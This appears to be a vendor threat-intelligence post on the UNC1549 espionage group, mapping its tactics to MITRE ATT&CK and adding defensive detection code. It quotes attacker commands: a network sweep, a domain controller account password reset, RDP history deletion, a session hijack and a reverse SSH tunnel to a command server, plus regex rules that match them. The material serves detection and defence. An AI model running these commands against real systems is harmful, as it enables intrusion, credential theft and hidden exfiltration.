UNC1549 TTPs: Iranian APT Targeting Aerospace and Defense

Overview

UNC1549 is an Iranian-linked cyber-espionage group active since at least June 2022. It targets aerospace, aviation, and defense organizations across the Middle East, South Asia, and Western Europe. The group deploys custom malware, uses fake React-based career portals to deliver multi-stage payloads, and exfiltrates data over encrypted C2 channels.

Known Aliases

  • Nimbus Manticore
  • Smoke Sandstorm

Associated Malware or Tools

  • MiniJunk (persistent backdoor)
  • MiniBrowse (browser credential stealer)
  • SIGHTGRAB (screenshot capture utility)
  • TRUSTRAP (fake authentication window for credential harvesting)

Techniques and TTPs (Mitre ATT&CK Mapping)

  • T1566.002 Phishing: Spearphishing Link
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell
  • T1053.005 Scheduled Task/Job: Scheduled Task
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1027 Obfuscated Files or Information
  • T1027.001 Obfuscated Files or Information: Binary Padding
  • T1036 Masquerading
  • T1070.001 Indicator Removal: Clear Windows Event Logs
  • T1574.001 Hijack Execution Flow: DLL Search Order Hijacking
  • T1003.006 OS Credential Dumping: DCSync
  • T1555.003 Credentials from Password Stores: Credentials from Web Browsers
  • T1087.002 Account Discovery: Domain Account
  • T1021.001 Remote Services: Remote Desktop Protocol
  • T1113 Screen Capture
  • T1572 Protocol Tunneling
  • T1041 Exfiltration Over C2 Channel

Detection and Prevention

Key Takeaways

  • UNC1549 is an Iranian-linked threat group, also known as Nimbus Manticore and Smoke Sandstorm, targeting aerospace, aviation, and defense organizations since at least June 2022.
  • The group runs spear-phishing campaigns using fake career portals that mimic companies like Boeing, Airbus, and Teledyne FLIR. Victims receive unique login credentials and are prompted to download malicious archives that deliver multi-stage malware.
  • UNC1549 deploys four custom tools: MiniJunk (backdoor), MiniBrowse (browser credential stealer), SIGHTGRAB (screenshot capture), and TRUSTRAP (fake authentication window for credential harvesting).
  • By late 2023, the group expanded beyond its initial targets in Israel, UAE, Turkey, India, and Albania to the worldwide aerospace and defense supply chain. In September 2025, operations extended into Portugal, Sweden, and Denmark.
  • The Picus Security Validation Platform includes a dedicated threat simulation for UNC1549 (Threat ID 74718) under the Windows Endpoint attack module, providing actionable mitigation insights based on real attack behaviors.

UNC1549 is an Iranian-linked threat group that has been running targeted operations since at least June 2022. The group focuses on aerospace, aviation, and defense organizations across Israel, the UAE, Turkey, India, and Albania.

By late 2023, UNC1549 expanded its focus to the worldwide aerospace and defense supply chain, running highly tailored intelligence-gathering operations that lasted through October 2025. In September 2025, the group shifted geographically into Western Europe, targeting organizations in Portugal, Sweden, and Denmark.

Their operations are highly targeted and include the creation of false career sites that mimic well-known entities such as Boeing, Airbus, and Teledyne FLIR. They then send spear-phishing emails containing login credentials for the false career sites, use the resulting access to drop multi-stage malware, and collect information through an encrypted channel.

This blog breaks down their tactics, techniques, and procedures using the MITRE ATT&CK framework. At the end, we will explain how Picus helps you against this threat actor.


What Are the Major Activities of UNC1549?

June 2022 (at least) – UNC1549 begins operations targeting aerospace, aviation, and defense organizations in Israel, the UAE, and potentially Turkey, India, and Albania [1].

Late 2023 – October 2025 – Highly tailored intelligence-gathering operations targeting the worldwide aerospace and defense supply chain [2].

September 2025 – A significant strategic expansion of operations into Western Europe, including Portugal, Sweden, and Denmark. This campaign relied heavily on false career portals and malicious recruitment lures and delivered heavily obfuscated, multi-stage malware, including the MiniJunk backdoor and the MiniBrowse credential stealer [3].

Which MITRE ATT&CK Techniques Are Used by UNC1549?

Tactic: Initial Access

T1566.002 Phishing: Spearphishing Link

The group sent targeted spear-phishing emails with links to fake, React-based career portals. These portals mimicked prominent aerospace and defense companies such as Boeing, Airbus, and Teledyne FLIR.

Victims received unique credentials to log into these portals. The portals then prompted victims to download malicious archives.

Here is an example of the malicious emails [2]:

Hi
According to the arrangements we made, your profile information has been sent. Use them and follow the instructions to complete the hiring procedure and receive the JD
After that, we will talk about the interview date.

mps teledyneflir.com.de/careers/auth

Username: 
Password: 

Tetyana Pidkovych
Human Resource Specialist
Teledyne FLIR
Berlin, Germany
tetyana.pidkovych@teledyneflir.com.de
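The lure above hinges on a lookalike domain: the brand name sits in a registration under a different top-level domain, so the sender and portal look plausible at a glance. The following is an added example (not code from the article or from Picus) of a mail-gateway check that pulls hostnames out of a message body and flags any that contain a protected brand string without being the brand's real domain. The legitimate domains in PROTECTED_BRANDS and the sample message are assumptions constructed for the example; the article names only the impersonated brands.

```python
import re

# Legitimate domains for the brands the article says UNC1549 impersonated.
# These legitimate domains are assumptions made for this example; the article
# names only the brands, not their real domains.
PROTECTED_BRANDS = {
    "teledyneflir": "teledyneflir.com",
    "boeing": "boeing.com",
    "airbus": "airbus.com",
}

# Hostnames inside URLs (with or without a scheme) and e-mail addresses.
HOST_RE = re.compile(r"(?<![\w.-])((?:[a-z0-9-]+\.)+[a-z]{2,})(?=[/\s]|$)", re.I | re.M)


def classify_host(host):
    """Return (verdict, brand) where verdict is 'legitimate', 'lookalike' or 'unrelated'."""
    h = host.lower().rstrip(".")
    for brand, legit in PROTECTED_BRANDS.items():
        if h == legit or h.endswith("." + legit):
            return "legitimate", brand
        # The brand string anywhere else in the name (teledyneflir.com.de is a .de
        # registration, boeing-careers.example a different registrant) is a lookalike.
        if brand in h.replace("-", ""):
            return "lookalike", brand
    return "unrelated", None


def find_lookalikes(message):
    """List (host, brand) for every lookalike hostname found in a message body."""
    hits = []
    for host in sorted({m.group(1).lower() for m in HOST_RE.finditer(message)}):
        verdict, brand = classify_host(host)
        if verdict == "lookalike":
            hits.append((host, brand))
    return hits


# Constructed message modelled on the lure quoted above; credentials are placeholders.
SAMPLE_EMAIL = """Hi
According to the arrangements we made, your profile information has been sent.
Use them and follow the instructions to complete the hiring procedure.

https://teledyneflir.com.de/careers/auth

Username: candidate
Password: [placeholder]

Human Resource Specialist
Teledyne FLIR
hr@teledyneflir.com.de
"""

if __name__ == "__main__":
    for host, brand in find_lookalikes(SAMPLE_EMAIL):
        print(f"lookalike of {brand}: {host}")
```

A production version would resolve the registrable domain with a public-suffix list rather than a substring test, but the substring rule already catches the pattern used here, where a naive "last two labels" parse would reduce teledyneflir.com.de to com.de and lose the brand entirely.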

Tactic: Execution

T1059.001 Command and Scripting Interpreter: PowerShell

PowerShell scripts were executed to conduct internal network reconnaissance, specifically for port scanning and pinging subnets associated with IT administrators.

Example conceptual commands are given below:

# Ping Sweeping
1..254 | ForEach-Object { if (Test-Connection -ComputerName "192.168.1.$_" -Count 1 -Quiet) { "192.168.1.$_ is up" } }

# Port Scanning
80,443,445,3389 | ForEach-Object { $t = New-Object Net.Sockets.TcpClient; try { $t.Connect("192.168.1.100",$_); "$_ OPEN" } catch { "$_ CLOSED" } }

Additionally, obfuscated Invoke-Kerberoast scripts were run for credential theft [2].

T1059.003 Command and Scripting Interpreter: Windows Command Shell

UNC1549 relied on the Windows command shell to execute built-in administrative tools like net.exe for enumerating Active Directory objects and resetting computer account passwords [2].

net user DC-01$ P@ssword

Tactic: Persistence

T1053.005 Scheduled Task/Job: Scheduled Task

During the infection sequence, the malware loader created scheduled tasks. These tasks forced the execution of a benign host file (MigAutoPlay.exe) and its sideloaded malicious DLL (userenv.dll) from a newly created working directory [3].

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

UNC1549 wrote to the Windows Registry Run keys to force the malware to execute automatically at user logon. Different backdoor versions used different registry paths. Some mimicked OneDrive or image viewers.

# Variant 1
Key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive FileCoAuth
Value: %LOCALAPPDATA%\Microsoft\Internet Explorer\secur32.dll

# Variant 2
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveCoUpdate
Value: %LOCALAPPDATA%\Microsoft\OneDrive\cache\logger\FileCoAuth.exe
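Both persistence mechanisms above (the scheduled task that launches MigAutoPlay.exe with its sideloaded userenv.dll, and the Run keys that point at a DLL or a OneDrive-named binary under %LOCALAPPDATA%) share traits that an autostart inventory can score without signatures. The following is an added example, not code from the article or from Picus, of such a triage pass over a constructed inventory. The two Run-key entries are the variants listed above; the task name, the benign entries, and the KNOWN_GOOD_USER_BINARIES allowlist are assumptions made for the example.

```python
import re

# Constructed autostart inventory: the two Run-key variants from the article, a
# scheduled-task entry modelled on the MigAutoPlay.exe sideload, and two benign
# entries. Task names and the benign entries are assumptions for the example.
AUTOSTART_ENTRIES = [
    {"source": r"HKCU\...\Run", "name": "OneDrive FileCoAuth",
     "target": r"%LOCALAPPDATA%\Microsoft\Internet Explorer\secur32.dll"},
    {"source": r"HKCU\...\Run", "name": "OneDriveCoUpdate",
     "target": r"%LOCALAPPDATA%\Microsoft\OneDrive\cache\logger\FileCoAuth.exe"},
    {"source": r"HKCU\...\Run", "name": "OneDrive",
     "target": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"source": "SchTask", "name": "MigAutoPlay",
     "target": r"C:\Users\alice\AppData\Roaming\MigAutoPlay\MigAutoPlay.exe"},
    {"source": "SchTask", "name": r"\Microsoft\Windows\WindowsBackup\ConfigNotification",
     "target": r"C:\Windows\System32\sdclt.exe /CONFIGNOTIFICATION"},
]

USER_WRITABLE = re.compile(
    r"%LOCALAPPDATA%|%APPDATA%|%TEMP%|\\AppData\\|\\Users\\Public\\|\\Temp\\", re.I)
# Windows system DLL names the article reports being mimicked or sideloaded.
SYSTEM_DLL_NAMES = {"secur32.dll", "userenv.dll"}
# Assumed allowlist of binaries legitimately launched from per-user directories.
KNOWN_GOOD_USER_BINARIES = {"onedrive.exe"}


def target_path(command_line):
    """Extract the file path from an autostart command line (quoted or bare)."""
    cmd = command_line.strip()
    if cmd.startswith('"'):
        return cmd[1:cmd.index('"', 1)]
    m = re.match(r"(.+?\.(?:exe|dll|cmd|bat))(?=\s|$)", cmd, re.I)
    return m.group(1) if m else cmd.split()[0]


def assess_entry(entry):
    """Return the list of rule names an autostart entry trips (empty if clean)."""
    path = target_path(entry["target"])
    norm = path.replace("\\", "/")
    base = norm.rsplit("/", 1)[-1].lower()
    folder = norm[: len(norm) - len(base)].lower()
    findings = []
    if base.endswith(".dll"):
        findings.append("target_is_dll")
    if base in SYSTEM_DLL_NAMES and not re.search(r"/windows/(system32|syswow64)/$", folder):
        findings.append("system_dll_name_outside_system_dir")
    if "onedrive" in entry["name"].lower() and base != "onedrive.exe":
        findings.append("name_mimics_onedrive")
    if USER_WRITABLE.search(path) and base not in KNOWN_GOOD_USER_BINARIES:
        findings.append("target_in_user_writable_dir")
    return findings


def triage(entries):
    """Map entry name -> findings for every entry that trips at least one rule."""
    return {e["name"]: f for e in entries if (f := assess_entry(e))}


if __name__ == "__main__":
    for name, findings in triage(AUTOSTART_ENTRIES).items():
        print(f"{name}: {', '.join(findings)}")
```

The genuine OneDrive entry lives in a user-writable directory too, which is why the allowlist is keyed on the executable name rather than the path; the attacker's entries are separated from it by the DLL target, the system-DLL name outside System32, and the OneDrive-themed name attached to a binary that is not OneDrive.exe.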

Tactic: Defense Evasion

T1027 Obfuscated Files or Information

UNC1549 applied heavy, compiler-level code obfuscation to their malware. This included complex branch structures, opaque predicates, individually encrypted strings, and obfuscated API function calls. The goal was to block reverse engineering and evade endpoint detection.

T1027.001 Obfuscated Files or Information: Binary Padding

The actor inflated the file size of their compiled malware by inserting large blocks of inert junk code. This exploited the size limitations of many antivirus scanning engines, causing them to truncate deep analysis and miss the payload.

T1036 Masquerading

The group named their malicious files after legitimate services like OneDrive (e.g., OneDriveFileCoAuth.exe).

They displayed fake graphical interfaces, such as false error messages about network connectivity, to hide the backdoor's setup process.

# Fake Graphical Interface
Connection Lost
Error connecting to survey. Please check your internet connection.

They also used lures tied to current events to disguise payloads.

T1070.001 Indicator Removal: Clear Windows Event Logs

The attackers erased traces of lateral movement by directly modifying the registry to delete RDP connection history keys [2].

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

T1574.001 Hijack Execution Flow: DLL Search Order Hijacking

The threat actor planted malicious DLLs alongside legitimate executables (like Microsoft, Citrix, VMware, or FortiGate binaries) or abused undocumented low-level API calls (RtlCreateProcessParameters) to manipulate the DllPath, forcing a legitimate process to sideload the malware.

Tactic: Credential Access

T1003.006 OS Credential Dumping: DCSync

UNC1549 performed DCSync attacks, using a modified utility derived from Mimikatz.

A DCSync attack lets an attacker steal password hashes from Active Directory. The attacker impersonates a DC and requests credential data through a legitimate replication protocol.

Active Directory uses the MS-DRSR protocol to keep Domain Controllers in sync. Attackers abuse this process.

But to use this technique, the attacker first needs to compromise an account with replication rights. UNC1549 ran net user <computer_name> <password> to reset a domain controller's computer account password in Active Directory. Since DC computer accounts hold replication rights by default, the attacker then used those credentials to execute a DCSync attack.

After the execution, they extracted NTLM hashes directly from compromised domain controllers [2].
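The DCSync sequence described here leaves two Security-log artifacts on the domain controllers: a 4724 (password reset) whose target is a DC computer account, and 4662 events whose Properties field carries the directory-replication control-access GUIDs. Plain 4662 rules that fire on replication by any account ending in "$" miss this case, because the actor really is a DC account once the password has been reset. The following is an added example, not code from the article or from Picus, that correlates the two. The REPLICATION_GUIDS values are the standard Active Directory control-access rights; the DC inventory, the 24-hour window and the sample events are assumptions constructed for the example.

```python
from datetime import datetime, timedelta

# Control-access-right GUIDs that appear in the Properties field of event 4662
# when an account requests directory replication (the operation DCSync abuses).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Assumed inventory of domain controller computer accounts for the example domain.
DOMAIN_CONTROLLER_ACCOUNTS = {"DC-01$", "DC-02$"}
# How long after a DC account password reset its replication requests stay suspect.
RESET_WINDOW = timedelta(hours=24)


def is_replication_request(event):
    """True for a 4662 whose Properties contain any replication control-access GUID."""
    props = event.get("Properties", "").lower()
    return event["EventID"] == 4662 and any(g in props for g in REPLICATION_GUIDS)


def detect_dcsync(events):
    """Return alerts as (rule, actor, detail) tuples, in time order."""
    alerts = []
    recent_resets = {}  # DC account -> (reset time, account that performed the reset)
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        when = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4724 and ev["TargetUserName"] in DOMAIN_CONTROLLER_ACCOUNTS:
            # Machine accounts rotate their own passwords automatically; an explicit
            # reset of a DC computer account is abnormal on its own.
            recent_resets[ev["TargetUserName"]] = (when, ev["SubjectUserName"])
            alerts.append(("dc_account_password_reset", ev["SubjectUserName"], ev["TargetUserName"]))
        elif is_replication_request(ev):
            actor = ev["SubjectUserName"]
            if actor not in DOMAIN_CONTROLLER_ACCOUNTS:
                alerts.append(("replication_by_non_dc_account", actor, ev["Computer"]))
            elif actor in recent_resets and when - recent_resets[actor][0] <= RESET_WINDOW:
                # Normal DC-to-DC replication also logs 4662 with these GUIDs; only the
                # correlation with a recent reset separates abuse from routine noise.
                alerts.append(("replication_after_dc_account_reset", actor, recent_resets[actor][1]))
    return alerts


# Constructed sample: routine replication, then a reset of DC-01$ by a user account,
# replication under the reset DC account, replication under the user account itself,
# and an unrelated 4662 that must not fire.
SAMPLE_EVENTS = [
    {"TimeCreated": "2025-03-07T09:58:00", "EventID": 4662, "SubjectUserName": "DC-02$",
     "Computer": "DC-01.corp.example", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"TimeCreated": "2025-03-07T10:05:00", "EventID": 4724, "SubjectUserName": "jdoe",
     "TargetUserName": "DC-01$", "Computer": "DC-01.corp.example"},
    {"TimeCreated": "2025-03-07T10:17:00", "EventID": 4662, "SubjectUserName": "DC-01$",
     "Computer": "DC-02.corp.example", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"TimeCreated": "2025-03-07T10:20:00", "EventID": 4662, "SubjectUserName": "jdoe",
     "Computer": "DC-01.corp.example", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"TimeCreated": "2025-03-07T10:21:00", "EventID": 4662, "SubjectUserName": "jdoe",
     "Computer": "DC-01.corp.example", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for rule, actor, detail in detect_dcsync(SAMPLE_EVENTS):
        print(f"{rule}: {actor} ({detail})")
```

Auditing of 4662 for directory service objects must be enabled on the DCs for the replication events to exist at all; the 4724 on a DC account is worth an alert by itself even where that auditing is not in place.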

T1555.003 Credentials from Password Stores: Credentials from Web Browsers

The group deployed a specialized stealer component, MiniBrowse, to extract saved credentials from web browsers. One variant stole saved Chrome credentials; another was injected directly into the browser to intercept logins and exfiltrate Edge login data. Both variants are DLLs injected into browser processes [3].

Additionally, TRUSTRAP malware displayed a fake authentication window to capture credentials in clear text [2].

Tactic: Discovery

T1087.002 Account Discovery: Domain Account

The group ran standard Windows command-line tools to enumerate Active Directory user accounts and map group memberships. Example commands that might be run are shown below:

# Enumerate domain users
net user /domain

# List all domain groups
net group /domain

# Take a snapshot of AD
ADExplorer.exe -snapshot "" output.dat

Tactic: Lateral Movement

T1021.001 Remote Services: Remote Desktop Protocol

UNC1549 relied heavily on RDP for lateral movement. They also performed RDP session hijacking by identifying active user sessions and connecting to them. This gave them access to active, unlocked browser windows.

The following commands might be run to hijack sessions:

# Enumerate Active Sessions
query session
# Hijack the Target Session
tscon  /dest:

Tactic: Collection

T1113 Screen Capture

UNC1549 deployed a custom utility (SIGHTGRAB) that periodically captured screenshots of the victim's active display at regular intervals. The images were saved incrementally to local directories, as shown in the example below [2].

C:\Users\Public\Videos\2025-3-7-10-17\1.jpg
C:\Users\Public\Videos\2025-3-7-10-17\2.jpg
C:\Users\Public\Videos\2025-3-7-10-17\3.jpg

Tactic: Command and Control

T1572 Protocol Tunneling

To bypass host-based security telemetry, the attackers established reverse SSH tunnels from compromised internal systems back to their command servers [2].

This encrypted exfiltration traffic and administrative communications.

C:\windows\system32\openssh\ssh.exe [Username]@[IP Address] -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070

  • -R flag: reverse tunnel flag (with the port value 1070)
  • -N flag: stops a remote shell from spawning. Think of the -N flag as "connect but don't do anything except keep the tunnel alive." It is used to avoid leaving a visible footprint.
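Several of the techniques in this post (the net.exe reset of a DC computer account under Windows Command Shell, the reg delete of RDP history under Indicator Removal, the tscon session hijack under Lateral Movement, the ADExplorer snapshot under Discovery, and the reverse SSH tunnel here) are plain command lines that process-creation telemetry (Security 4688 with command-line auditing, or Sysmon event 1) records verbatim. The following is an added example, not code from the article or from Picus, of hunting rules run over constructed process-creation records. The hostnames, user names, session identifier and the 203.0.113.10 placeholder address are assumptions for the example; the command lines mirror the ones quoted on this page.

```python
import re

# Constructed process-creation records (Sysmon event 1 / Security 4688 style).
# Hosts, users, the tscon session values and the placeholder IP are invented.
SAMPLE_EVENTS = [
    {"host": "WS-17", "user": r"CORP\jdoe",
     "cmd": r'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f'},
    {"host": "WS-17", "user": r"CORP\jdoe", "cmd": "net user DC-01$ P@ssword"},
    {"host": "WS-17", "user": r"CORP\jdoe", "cmd": "query session"},
    {"host": "WS-17", "user": r"CORP\jdoe", "cmd": "tscon 3 /dest:rdp-tcp#12"},
    {"host": "WS-17", "user": r"CORP\jdoe",
     "cmd": r"C:\windows\system32\openssh\ssh.exe svc@203.0.113.10 -p 443 "
            r"-o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070"},
    {"host": "WS-17", "user": r"CORP\jdoe", "cmd": r'ADExplorer.exe -snapshot "" output.dat'},
    # Benign activity that must not fire: an admin's interactive ssh and a self-lookup.
    {"host": "WS-02", "user": r"CORP\bsmith",
     "cmd": r"C:\windows\system32\openssh\ssh.exe -n admin@gw.corp.example uptime"},
    {"host": "WS-02", "user": r"CORP\bsmith", "cmd": "net user bsmith /domain"},
]

RULES = [
    ("rdp_history_cleared",
     re.compile(r"\breg(?:\.exe)?\s+delete\s+.*terminal server client", re.I)),
    # net user <name>$ <password>: a trailing $ marks a computer account.
    ("computer_account_password_reset",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\$\s+\S+", re.I)),
    ("rdp_session_hijack",
     re.compile(r"\btscon(?:\.exe)?\s+\S+\s+/dest:", re.I)),
    # -R (reverse forward) together with -N (no remote command). The flags are matched
    # case-sensitively because ssh's lowercase -n is a different option.
    ("reverse_ssh_tunnel",
     re.compile(r"(?i:\bssh(?:\.exe)?)\b(?=.*\s-R\s)(?=.*\s-N(?:\s|$))")),
    ("ad_snapshot_export",
     re.compile(r"\badexplorer(?:\.exe)?\s+.*-snapshot", re.I)),
]


def hunt(events):
    """Return (rule, host, user, cmd) for every record that matches a rule."""
    hits = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmd"]):
                hits.append((name, ev["host"], ev["user"], ev["cmd"]))
    return hits


if __name__ == "__main__":
    for rule, host, user, cmd in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {host} {user}: {cmd}")
```

The query session record is deliberately left unmatched: on its own it is routine administration, and the tscon that follows it is the line worth alerting on. Command-line auditing for 4688 is off by default and has to be enabled by policy before these records carry the command line at all.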

Tactic: Exfiltration

T1041 Exfiltration Over C2 Channel

UNC1549 exfiltrated stolen data directly over the established HTTPS command and control channel to an attacker-controlled cloud infrastructure. This included harvested browser credentials and files.

The following shows some HTTP headers from the MiniBrowse’s exfiltration process [2]:

Content-Disposition: form-data; name="file"; filename="edgeLog.txt"\r\n
Content-Type: application/octet-stream\r\n\r\n
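The two headers above come from a multipart/form-data upload, which is how MiniBrowse hands its output to the C2 server over HTTPS. Where TLS is terminated at a proxy, the body can be parsed and the file parts inspected. The following is an added example, not code from the article or from Picus, of a minimal multipart parser with two checks on each uploaded part: a filename that matches the edgeLog.txt artifact quoted above, and a text payload that is declared application/octet-stream. The boundary string, the sample body and its placeholder credential line are constructed for the example.

```python
import re

# Filenames the article reports for MiniBrowse output (lowercased for matching).
KNOWN_STEALER_ARTIFACTS = {"edgelog.txt"}


def boundary_from_content_type(header_value):
    """Pull the boundary token out of a multipart Content-Type request header."""
    m = re.search(r'boundary="?([^";]+)"?', header_value)
    return m.group(1) if m else None


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into parts: {'headers': {...}, 'data': bytes}."""
    delimiter = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter: --boundary--
            break
        chunk = chunk.lstrip(b"\r\n")
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.decode("latin-1").partition(":")
            headers[name.strip().lower()] = value.strip()
        parts.append({"headers": headers, "data": data.rstrip(b"\r\n")})
    return parts


def looks_like_text(data):
    """True when every byte is printable ASCII or ordinary whitespace."""
    return all(b in b"\r\n\t" or 32 <= b < 127 for b in data)


def flag_exfil_uploads(parts):
    """Return (filename, reasons) for each file part that trips a rule."""
    alerts = []
    for part in parts:
        disposition = part["headers"].get("content-disposition", "")
        m = re.search(r'filename="([^"]*)"', disposition)
        if not m:
            continue                           # not a file upload
        filename = m.group(1)
        ctype = part["headers"].get("content-type", "").lower()
        reasons = []
        if filename.lower() in KNOWN_STEALER_ARTIFACTS:
            reasons.append("filename matches known MiniBrowse artifact")
        if ctype == "application/octet-stream" and filename.lower().endswith((".txt", ".log")) \
                and looks_like_text(part["data"]):
            reasons.append("text payload declared as application/octet-stream")
        if reasons:
            alerts.append((filename, reasons))
    return alerts


# Constructed request body reproducing the headers quoted above; the credential
# line is a placeholder.
SAMPLE_CONTENT_TYPE = "multipart/form-data; boundary=boundary123"
SAMPLE_BODY = (
    b"--boundary123\r\n"
    b'Content-Disposition: form-data; name="file"; filename="edgeLog.txt"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"https://mail.example.test\tuser@example.test\t[placeholder]\r\n"
    b"--boundary123\r\n"
    b'Content-Disposition: form-data; name="id"\r\n\r\n'
    b"host-42\r\n"
    b"--boundary123--\r\n"
)

if __name__ == "__main__":
    parts = parse_multipart(SAMPLE_BODY, boundary_from_content_type(SAMPLE_CONTENT_TYPE))
    for filename, reasons in flag_exfil_uploads(parts):
        print(f"{filename}: {'; '.join(reasons)}")
```

The artifact-name rule is brittle by design (the operator can rename the file), so the content-type mismatch is the check to keep: a stealer that wraps plain text as an opaque binary stream is avoiding the keyword inspection that a text/plain part would receive.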

How Does Picus Simulate UNC1549 Attacks?

We also strongly suggest simulating UNC1549 attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for UNC1549:

Threat ID   Threat Name                      Attack Module
74718       UNC1549 Threat Group Campaign    Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the UNC1549 Group?

UNC1549 is also known as: Nimbus Manticore, Smoke Sandstorm.

References

[1] “When Cats Fly: Suspected Iranian Threat Actor UNC1549 Targets Israeli and Middle East Aerospace and Defense Sectors,” Google Cloud Blog. Accessed: Mar. 27, 2026. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/suspected-iranian-unc1549-targets-israel-middle-east

[2] “Frontline Intelligence: Analysis of UNC1549 TTPs, Custom Tools, and Malware Targeting the Aerospace and Defense Ecosystem,” Google Cloud Blog. Accessed: Mar. 26, 2026. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/analysis-of-unc1549-ttps-targeting-aerospace-defense

[3] “Nimbus Manticore Deploys New Malware Targeting Europe,” Check Point Research. Accessed: Mar. 26, 2026. [Online]. Available: https://research.checkpoint.com/2025/nimbus-manticore-deploys-new-malware-targeting-europe/

FAQ

Q: What is UNC1549?

A: UNC1549 is an Iranian-linked threat group active since at least June 2022. The group targets aerospace, aviation, and defense organizations across Israel, the UAE, Turkey, India, Albania, and, as of September 2025, Western Europe. The group is also known as Nimbus Manticore and Smoke Sandstorm.

Q: Which industries and countries does UNC1549 target?

A: UNC1549 focuses on aerospace, aviation, and defense organizations. Initial targets included Israel, the UAE, Turkey, India, and Albania. By late 2023, the group expanded to the worldwide aerospace and defense supply chain. In September 2025, UNC1549 extended operations into Portugal, Sweden, and Denmark.

Q: How does UNC1549 gain initial access to victim systems?

A: UNC1549 sends spear-phishing emails with links to fake, React-based career portals. These portals mimic well-known companies such as Boeing, Airbus, and Teledyne FLIR. Victims receive unique login credentials and are prompted to download malicious archives, which deliver multi-stage malware onto their systems.

Q: What malware and tools does UNC1549 use?

A: UNC1549 deploys several custom tools. MiniJunk is a backdoor used for persistent access. MiniBrowse is a credential stealer that targets saved browser data from Chrome and Edge. SIGHTGRAB captures periodic screenshots of the victim's screen. TRUSTRAP displays fake authentication windows to collect credentials in clear text.

Q: How does UNC1549 avoid detection?

A: UNC1549 uses heavy compiler-level code obfuscation, including encrypted strings and opaque predicates. The group inflates malware file sizes with junk code to bypass antivirus scanning limits. Malicious files are named after legitimate services like OneDrive. The group also erases RDP connection history from the Windows Registry to remove traces of lateral movement.

Q: How does Picus help organizations defend against UNC1549?

A: Picus simulates UNC1549 attack techniques through the Picus Security Validation Platform. The Picus Threat Library includes a dedicated threat simulation for UNC1549 (Threat ID 74718) under the Windows Endpoint attack module. Organizations get actionable mitigation insights based on real attack behaviors. A 14-day free trial of the Picus Security Validation Platform is available.